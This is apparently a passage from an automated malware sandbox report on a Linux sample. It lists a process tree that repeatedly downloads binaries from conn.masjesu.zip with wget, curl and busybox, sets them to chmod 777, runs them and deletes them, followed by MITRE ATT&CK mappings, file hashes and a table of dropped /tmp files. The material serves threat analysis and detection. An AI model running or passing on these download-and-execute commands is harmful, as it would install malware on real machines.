- /tmp/MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp
  ./MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp
  2⤵
  - Executes dropped EXE
  PID:960
- /bin/rm
  rm MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp
  2⤵
  PID:961
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z
  2⤵
  - System Network Configuration Discovery
  PID:962
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:963
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z
  2⤵
  PID:965
- /bin/chmod
  chmod 777 DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z
  2⤵
  - File and Directory Permissions Modification
  PID:966
- /tmp/DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z
  ./DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z
  2⤵
  - Executes dropped EXE
  PID:967
- /bin/rm
  rm DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z
  2⤵
  PID:968
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7
  2⤵
  - System Network Configuration Discovery
  PID:969
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:970
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7
  2⤵
  PID:972
- /bin/chmod
  chmod 777 gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7
  2⤵
  - File and Directory Permissions Modification
  PID:973
- /tmp/gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7
  ./gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7
  2⤵
  - Executes dropped EXE
  PID:974
- /bin/rm
  rm gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7
  2⤵
  PID:975
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu
  2⤵
  - System Network Configuration Discovery
  PID:976
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:977
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu
  2⤵
  - System Network Configuration Discovery
  PID:979
- /bin/chmod
  chmod 777 Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu
  2⤵
  - File and Directory Permissions Modification
  PID:980
- /tmp/Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu
  ./Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu
  2⤵
  - Executes dropped EXE
  PID:981
- /bin/rm
  rm Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu
  2⤵
  PID:982
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z
  2⤵
  PID:983
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:984
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z
  2⤵
  - System Network Configuration Discovery
  PID:986
- /bin/chmod
  chmod 777 lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z
  2⤵
  - File and Directory Permissions Modification
  PID:987
- /tmp/lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z
  ./lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z
  2⤵
  - Executes dropped EXE
  PID:988
- /bin/rm
  rm lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z
  2⤵
  PID:989
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r
  2⤵
  - System Network Configuration Discovery
  PID:990
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:991
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r
  2⤵
  PID:993
- /bin/chmod
  chmod 777 iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r
  2⤵
  - File and Directory Permissions Modification
  PID:994
- /tmp/iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r
  ./iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r
  2⤵
  - Executes dropped EXE
  PID:995
- /bin/rm
  rm iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r
  2⤵
  PID:996
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1
  2⤵
  PID:997
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:998
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1
  2⤵
  PID:1000
- /bin/chmod
  chmod 777 iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1
  2⤵
  - File and Directory Permissions Modification
  PID:1001
- /tmp/iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1
  ./iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1
  2⤵
  - Executes dropped EXE
  PID:1002
- /bin/rm
  rm iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1
  2⤵
  PID:1003

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	Process
/tmp/lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO	738	lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO
/tmp/AbZDorGA28H0E3dHfaRN80ddRvv7THmnat	745	AbZDorGA28H0E3dHfaRN80ddRvv7THmnat
/tmp/KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN	753	KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN
/tmp/MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp	779	MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp
/tmp/DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z	806	DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z
/tmp/gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7	818	gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7
/tmp/Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu	835	Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu
/tmp/lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z	860	lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z
/tmp/iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r	869	iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r
/tmp/iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1	876	iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1
/tmp/oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV	883	oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV
/tmp/gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ	890	gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ
/tmp/h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf	897	h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf
/tmp/gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj	904	gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj
/tmp/oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV	911	oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV
/tmp/gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ	918	gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ
/tmp/h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf	925	h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf
/tmp/gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj	932	gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj
/tmp/lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO	939	lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO
/tmp/AbZDorGA28H0E3dHfaRN80ddRvv7THmnat	946	AbZDorGA28H0E3dHfaRN80ddRvv7THmnat
/tmp/KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN	953	KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN
/tmp/MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp	960	MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp
/tmp/DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z	967	DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z
/tmp/gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7	974	gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7
/tmp/Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu	981	Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu
/tmp/lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z	988	lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z
/tmp/iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r	995	iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r
/tmp/iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1	1002	iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1